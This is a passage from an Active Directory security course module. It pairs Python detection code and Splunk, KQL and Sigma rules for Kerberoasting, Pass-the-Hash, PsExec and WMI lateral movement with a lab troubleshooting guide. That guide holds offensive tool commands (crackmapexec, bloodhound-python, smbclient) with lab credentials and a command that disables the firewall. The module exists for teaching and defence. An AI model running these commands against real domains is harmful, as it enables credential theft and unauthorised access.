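def _source_ip(ip_address):
    """4769 records IPv4 clients as '::ffff:10.10.2.50'; drop the IPv6 prefix."""
    return ip_address.removeprefix("::ffff:")


def analyze_4769(events):
    """Return alerts for a list of 4769 records.

    Each record carries a timestamp (ISO 8601) and the winlog.event_data fields
    TargetUserName, ServiceName, TicketEncryptionType and IpAddress. Note that
    ServiceName is the service ACCOUNT (e.g. svc_sql), not the SPN string.
    """
    alerts = []
    rc4_window = defaultdict(deque)   # source IP -> (timestamp, service account) pairs
    burst_sources, unknown_users = set(), set()

    for ev in sorted(events, key=lambda e: e["timestamp"]):
        ts = datetime.fromisoformat(ev["timestamp"])
        user = _principal(ev["TargetUserName"])
        src = _source_ip(ev["IpAddress"])
        service = ev["ServiceName"]

        # Golden Ticket indicator (LAB 5.6): a principal the directory does not know.
        # Computer accounts ("CLIENT01$") are not in the user list, so skip them.
        if not user.endswith("$") and user not in KNOWN_USERS and user not in unknown_users:
            unknown_users.add(user)
            alerts.append({"rule": "unknown_principal", "user": user,
                           "source": src, "service": service})

        # Kerberoasting indicator: RC4 service tickets (TGT requests excluded) in a burst.
        if ev["TicketEncryptionType"] != RC4_HMAC or service.lower().startswith("krbtgt"):
            continue
        window = rc4_window[src]
        window.append((ts, service))
        while ts - window[0][0] > BURST_WINDOW:      # slide the 60-second window
            window.popleft()
        distinct = {name for _, name in window}
        if len(distinct) >= BURST_COUNT and src not in burst_sources:
            burst_sources.add(src)
            alerts.append({"rule": "kerberoast_burst", "source": src,
                           "user": user, "services": sorted(distinct)})
    return alerts


# Constructed 4769 records: a TGT request, then RC4 tickets for six service accounts
# (only svc_sql exists in the lab; the others are made up) from an assumed red-team
# address 10.10.2.50, benign AES traffic from CLIENT01, and a forged principal.
SAMPLE_4769 = [
    {"timestamp": "2024-01-15T10:23:40", "TargetUserName": "jsmith@APOPHIS.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.2.50"},
    *({"timestamp": f"2024-01-15T10:23:{41 + i:02d}", "TargetUserName": "jsmith@APOPHIS.LOCAL",
       "ServiceName": svc, "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.2.50"}
      for i, svc in enumerate(["svc_sql", "svc_web", "svc_backup", "svc_ftp", "svc_print", "svc_mon"])),
    {"timestamp": "2024-01-15T10:24:05", "TargetUserName": "jdoe@APOPHIS.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.4.110"},
    {"timestamp": "2024-01-15T10:30:00", "TargetUserName": "fakeadmin@APOPHIS.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.2.50"},
]


def run_sample_4769():
    return analyze_4769(SAMPLE_4769)


if __name__ == "__main__":
    for alert in run_sample_4769():
        print(alert)
```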
Detection Rules for Pass-the-Hash
Event ID 4624 (Logon) with Type 3 (Network Logon):
SUSPICIOUS INDICATORS:
- Logon Type: 3 (network)
- Authentication Package: NTLM (not Kerberos)
- Elevated Token: Yes
- Source IP: Not domain controller
SPLUNK QUERY:
```text
index=windows EventCode=4624 Logon_Type=3 Authentication_Package=NTLM Elevated_Token=Yes
| where Source_Network_Address!="10.10.4.100"
| stats count by Account_Name, Source_Network_Address
```
SIGMA RULE:
```yaml
title: Pass-the-Hash Activity Detected
status: experimental
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4624
        LogonType: 3
        AuthenticationPackageName: 'NTLM'
    condition: selection
fields:
    - TargetUserName
    - IpAddress
falsepositives:
    - Legitimate NTLM authentication (rare in modern environments)
level: high
```
Detection Rules for Lateral Movement
Event ID 7045 (Service Installation) - PsExec:
INDICATORS:
- Service name: Contains random characters (e.g., "PSEXESVC")
- Service file path: \\Windows\\[random].exe
- Started by: Network logon (Event 4624 Type 3 precedes)
KQL QUERY:
```text
event.code: 7045 AND
winlog.event_data.ServiceFileName: *\\Windows\\*.exe AND
NOT winlog.event_data.ServiceName: (known_service_list)
```
Event ID 4688 (Process Creation) - WMI Execution:
INDICATORS:
- Parent process: C:\Windows\System32\wbem\WmiPrvSE.exe
- Child process: Suspicious (cmd.exe, powershell.exe, unusual binaries)
- Command line: Contains encoded commands or download cradles
KQL QUERY:
```text
event.code: 4688 AND
process.parent.name: "WmiPrvSE.exe" AND
process.name: ("cmd.exe" OR "powershell.exe" OR "wscript.exe")
```
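The Pass-the-Hash and lateral-movement rules above, as an added Python example (not part of this module): it correlates a 4624 NTLM network logon with the 7045 service install that PsExec produces on the same host within minutes, and flags WmiPrvSE.exe spawning a shell. The event records and the red-team address 10.10.2.50 are constructed.

```python
import ntpath
from datetime import datetime, timedelta

DC_ADDRESSES = {"10.10.4.100"}             # DC01: logons sourced from it are excluded
CORRELATION_WINDOW = timedelta(minutes=5)  # a 4624 must precede the 7045 by at most this
WMI_SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe"}


def _basename(path):
    """Windows path -> lowercase file name ('C:\\Windows\\X.exe' -> 'x.exe')."""
    return ntpath.basename(path).lower()


def is_pth_logon(ev):
    """4624 with the Pass-the-Hash indicators of the Splunk query above.

    Machine accounts (names ending in '$') authenticate with NTLM routinely,
    so they are excluded to keep the rule usable.
    """
    return (ev["EventID"] == 4624
            and ev["LogonType"] == 3
            and ev["AuthenticationPackageName"].upper() == "NTLM"
            and ev["ElevatedToken"] == "Yes"        # raw XML carries %%1842 for Yes
            and ev["IpAddress"] not in DC_ADDRESSES
            and not ev["TargetUserName"].endswith("$"))


def is_admin_share_service(ev):
    """7045 whose binary sits directly in \\Windows, where ADMIN$ uploads land."""
    if ev["EventID"] != 7045:
        return False
    path = ev["ServiceFileName"].lower()
    return ntpath.dirname(path).rstrip("\\").endswith("\\windows") and path.endswith(".exe")


def is_wmi_execution(ev):
    """4688 spawned by WmiPrvSE.exe with a shell or script host as child."""
    return (ev["EventID"] == 4688
            and _basename(ev["ParentProcessName"]) == "wmiprvse.exe"
            and _basename(ev["NewProcessName"]) in WMI_SUSPICIOUS_CHILDREN)


def correlate(events):
    """Walk events in time order and emit alerts.

    A 7045 on the same computer within CORRELATION_WINDOW after a PtH logon is
    reported as the PsExec chain from LAB 5.4.1 (network logon, then service
    install). A 7045 without that context is left to the path-based KQL rule
    above, because legitimate installers also drop binaries in \\Windows.
    """
    alerts = []
    last_pth = {}   # computer name -> (timestamp, account, source ip)
    for ev in sorted(events, key=lambda e: e["timestamp"]):
        ts = datetime.fromisoformat(ev["timestamp"])
        host = ev["Computer"]
        if is_pth_logon(ev):
            last_pth[host] = (ts, ev["TargetUserName"], ev["IpAddress"])
            alerts.append({"rule": "pth_logon", "host": host,
                           "user": ev["TargetUserName"], "source": ev["IpAddress"]})
        elif is_admin_share_service(ev) and host in last_pth:
            pth_ts, user, src = last_pth[host]
            if ts - pth_ts <= CORRELATION_WINDOW:
                alerts.append({"rule": "pth_then_service", "host": host, "user": user,
                               "source": src, "service": ev["ServiceName"],
                               "binary": ev["ServiceFileName"]})
        elif is_wmi_execution(ev):
            alerts.append({"rule": "wmi_execution", "host": host,
                           "child": _basename(ev["NewProcessName"]),
                           "command_line": ev["CommandLine"]})
    return alerts


# Constructed events in winlog.event_data field names; the psexec.py service name
# and binary are made up to look like Impacket's random names.
SAMPLE_EVENTS = [
    # Benign: CLIENT01 authenticating DC01's machine account with Kerberos.
    {"timestamp": "2024-01-15T10:39:00", "EventID": 4624, "Computer": "CLIENT01.apophis.local",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "ElevatedToken": "Yes",
     "TargetUserName": "DC01$", "IpAddress": "10.10.4.100"},
    # psexec.py -hashes ... apophis.local/Administrator@10.10.4.110 from the red-team host.
    {"timestamp": "2024-01-15T10:40:00", "EventID": 4624, "Computer": "CLIENT01.apophis.local",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "ElevatedToken": "Yes",
     "TargetUserName": "Administrator", "IpAddress": "10.10.2.50"},
    {"timestamp": "2024-01-15T10:40:08", "EventID": 7045, "Computer": "CLIENT01.apophis.local",
     "ServiceName": "fTqXjdRn", "ServiceFileName": "C:\\Windows\\fTqXjdRn.exe"},
    # wmiexec.py ... "ipconfig" against the same host.
    {"timestamp": "2024-01-15T10:41:00", "EventID": 4688, "Computer": "CLIENT01.apophis.local",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /Q /c ipconfig"},
    # Benign: an agent installer on DC01 with no preceding PtH logon.
    {"timestamp": "2024-01-15T11:00:00", "EventID": 7045, "Computer": "DC01.apophis.local",
     "ServiceName": "Sysmon64", "ServiceFileName": "C:\\Windows\\Sysmon64.exe"},
]


def run_sample_lateral():
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample_lateral():
        print(alert)
```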
Defensive Hardening Recommendations
```powershell
# DISABLE NTLM AUTHENTICATION (force Kerberos only)
# Group Policy: Computer Configuration > Windows Settings > Security Settings
#   > Local Policies > Security Options
#   Network security: Restrict NTLM: Incoming NTLM traffic = Deny all accounts

# ENABLE LAPS (LOCAL ADMIN PASSWORD SOLUTION)
# Randomizes local admin passwords on each machine (prevents lateral movement)
# Download: https://www.microsoft.com/en-us/download/details.aspx?id=46899

# IMPLEMENT PROTECTED USERS GROUP
# Add high-privilege accounts to "Protected Users" group (prevents NTLM auth)
Add-ADGroupMember -Identity "Protected Users" -Members Administrator,svc_sql

# ENABLE CREDENTIAL GUARD (Windows 10/Server 2016+)
# Protects LSASS from memory dumping attacks
# Group Policy: Computer Configuration > Administrative Templates
#   > System > Device Guard > Turn On Virtualization Based Security

# MONITOR PRIVILEGED GROUP CHANGES
# Alert on Event ID 4728, 4732, 4756 (user added to security-enabled group)

# IMPLEMENT TIERED ADMINISTRATION MODEL
# Tier 0: Domain Controllers, Domain Admins (separate credentials)
# Tier 1: Servers (different admin accounts)
# Tier 2: Workstations (standard users)
# Prevents compromise cascade
```
MITRE ATT&CK FRAMEWORK MAPPING
| Technique ID | Technique Name | Lab Coverage |
|---|---|---|
| T1558.003 | Kerberoasting | LAB 5.2 (GetUserSPNs, Hashcat) |
| T1550.002 | Pass-the-Hash | LAB 5.3 (Secretsdump, PsExec -hashes) |
| T1021.002 | SMB/Windows Admin Shares | LAB 5.4 (PsExec, SMBExec) |
| T1021.006 | Windows Remote Management | LAB 5.4 (Evil-WinRM) |
| T1047 | Windows Management Instrumentation | LAB 5.4 (WMIExec) |
| T1087.002 | Domain Account Discovery | LAB 5.5 (BloodHound enumeration) |
| T1069.002 | Domain Groups Discovery | LAB 5.5 (BloodHound group mapping) |
| T1482 | Domain Trust Discovery | LAB 5.5 (BloodHound trust analysis) |
| T1558.001 | Golden Ticket | LAB 5.6 (Ticketer.py, KRBTGT extraction) |
| T1003.001 | LSASS Memory Dump | LAB 5.3 (Secretsdump, Mimikatz) |
Kill Chain Phase: Lateral Movement (Stage 4), Privilege Escalation (Stage 3)
TROUBLESHOOTING GUIDE
Issue: GetUserSPNs fails with "KRB_AP_ERR_SKEW"
Root Cause: Clock skew between Kali Linux and Domain Controller (Kerberos requires <5 min difference)
Solution:
```bash
# SYNC TIME WITH DOMAIN CONTROLLER
sudo ntpdate 10.10.4.100
# Or: sudo timedatectl set-ntp true

# VERIFY TIME SYNC
date
# Compare to DC time
```
Issue: Secretsdump returns "STATUS_LOGON_FAILURE"
Root Cause: Incorrect credentials or account locked
Solution:
```bash
# VERIFY CREDENTIALS WITH CRACKMAPEXEC (from Kali)
crackmapexec smb 10.10.4.100 -u svc_sql -p Password123 -d apophis.local
```
```powershell
# CHECK ACCOUNT STATUS ON DOMAIN CONTROLLER (PowerShell on DC01)
Get-ADUser -Identity svc_sql -Properties LockedOut, PasswordExpired | Select-Object Enabled, LockedOut, PasswordExpired
```
Issue: BloodHound shows no data after import
Root Cause: JSON files empty or collection failed
Solution:
```bash
# RE-RUN COLLECTION WITH VERBOSE OUTPUT
bloodhound-python -u jsmith -p Welcome1 -d apophis.local -ns 10.10.4.100 -c All --zip -v
# --zip = Creates single ZIP file for easier upload
# -v    = Verbose output for debugging

# VERIFY FILE SIZES
ls -lh *.json
# Should have KB-MB of data, not 0 bytes
```
Issue: PsExec hangs at "Requesting shares"
Root Cause: Firewall blocking SMB (port 445) or ADMIN$ share not accessible
Solution:
```bash
# TEST SMB CONNECTIVITY (quote the credential: "!" triggers bash history expansion)
smbclient -L //10.10.4.110 -W apophis.local -U 'Administrator%P@ssw0rd!'
# Should show ADMIN$, C$, IPC$ shares
```
```powershell
# CHECK WINDOWS FIREWALL ON TARGET (from compromised shell)
Get-NetFirewallProfile | Select-Object Name, Enabled
# If enabled, disable for lab: Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
```
PROFESSOR'S GUIDANCE
Why Active Directory is the "Crown Jewel"
Statistics from Real Breaches:
- 82% of data breaches involve stolen credentials (Verizon DBIR 2023)
- Average time to crack Kerberoasted password: 6 hours (weak), 2 days (medium)
- 95% of organizations have at least one SPN with weak password
- 80% of organizations never rotate KRBTGT password (golden tickets persist indefinitely)
Real-World Attacker Workflow:
- Phishing email → User clicks → Download payload
- Payload beacons to C2 server → Attacker gains foothold
- Run Mimikatz/SharpHound → Extract credentials, map domain
- Kerberoast service accounts → Crack offline → Obtain Domain Admin
- Lateral movement → Access file servers, databases → Exfiltrate data
- Deploy ransomware → Domain-wide encryption
Defense-in-Depth Strategy:
- Prevent: Strong passwords (15+ chars), LAPS, Credential Guard
- Detect: Log Event IDs 4768/4769/4624/4688, monitor NTLM usage
- Respond: Isolate compromised accounts, reset KRBTGT (twice), forensic analysis
Common Student Mistakes
1. Using Domain Admin for everything:
- In real enterprise, you'd use least-privilege service accounts
- Lab uses DA for simplicity, but document "in production, use delegated access"
2. Not capturing network traffic:
- Run Wireshark during Kerberoasting to see TGS-REQ/TGS-REP exchange
- Blue team needs to recognize these patterns in PCAP analysis
3. Forgetting to reset KRBTGT after Golden Ticket lab:
- Golden tickets persist even if you "fix" everything else
- Must reset KRBTGT password TWICE (24 hours apart) to fully remediate
4. Over-relying on tools without understanding:
- BloodHound is NOT magic—it visualizes AD relationships you could query manually
- Practice writing custom LDAP queries (ldapsearch, PowerShell Get-ADUser)
Time Investment
- AD deployment: 2-3 hours
- Kerberoasting lab: 1-2 hours
- Pass-the-Hash lab: 1-2 hours
- Lateral movement: 1-2 hours
- BloodHound enumeration: 2-3 hours
- Golden Ticket attack: 1-2 hours
- Detection rules: 2-3 hours
Total: 10-18 hours
Real-World Skills Developed
By mastering this module, you can:
- Perform AD penetration testing for Red Team engagements
- Identify identity-based attack vectors in enterprise environments
- Implement detection rules for credential theft (SOC analyst role)
- Architect secure AD environments (prevent Kerberoasting, PtH)
- Understand attacker tradecraft (MITRE ATT&CK Lateral Movement tactics)
KNOWLEDGE CHECK
Before proceeding to MOD6, you should be able to answer:
1. What makes an account Kerberoastable?
   - Answer: Account must have a Service Principal Name (SPN) registered
2. Why is Kerberoasting attractive to attackers?
   - Answer: Offline cracking (no account lockout), any domain user can request tickets, targets weak passwords
3. What is the difference between Pass-the-Hash and Pass-the-Ticket?
   - Answer: PtH uses an NTLM hash for authentication, PtT uses a Kerberos ticket (TGT or service ticket)
4. How does PsExec achieve code execution?
   - Answer: Copies executable to ADMIN$ share, creates Windows service, starts service, returns output via named pipes
5. What is the BloodHound query to find Kerberoastable accounts?
   - Answer: Analysis > "List all Kerberoastable Accounts" or Cypher: MATCH (u:User {hasspn: true}) RETURN u
6. Why are Golden Tickets called "golden"?
   - Answer: Forged TGT grants access to ANY resource, valid for 10 years, persists after password resets
7. What Windows Event ID indicates a Kerberos service ticket request?
   - Answer: Event ID 4769 (TGS-REQ)
8. How do you fully remediate a Golden Ticket attack?
   - Answer: Reset KRBTGT password TWICE (24 hours apart) to invalidate all forged tickets
DELIVERABLES CHECKLIST
Before proceeding to Module 6, submit/complete:
- Windows Server 2022 Domain Controller configured (apophis.local)
- Windows 10 endpoint joined to domain
- Service account (svc_sql) with SPN created
- Kerberoasting output showing cracked password
- Secretsdump output with NTLM hashes extracted
- PsExec screenshot showing SYSTEM shell on remote target
- CrackMapExec output showing "Pwn3d!" with Pass-the-Hash
- BloodHound JSON files and attack path visualization screenshot
- Golden Ticket creation and usage demonstration
- Screenshots showing:
  - GetUserSPNs.py enumeration
  - Hashcat cracking Kerberos ticket
  - Secretsdump dumping DC hashes
  - PsExec shell with whoami output
  - BloodHound shortest path to Domain Admins
  - CrackMapExec lateral movement to multiple hosts
  - Event Viewer showing Event ID 4769 (Kerberoasting detection)
END OF MODULE 5
Next Steps:
- Take snapshot of all VMs: "Post-MOD5-AD-Compromise"
- Document all extracted credentials in password spreadsheet
- Practice writing detection rules for each attack technique
- Proceed to MOD6: Incident Response & Digital Forensics
Remember: Every credential you steal as Red Team becomes forensic evidence for Blue Team. In MOD6, you'll investigate these attacks from the defender's perspective!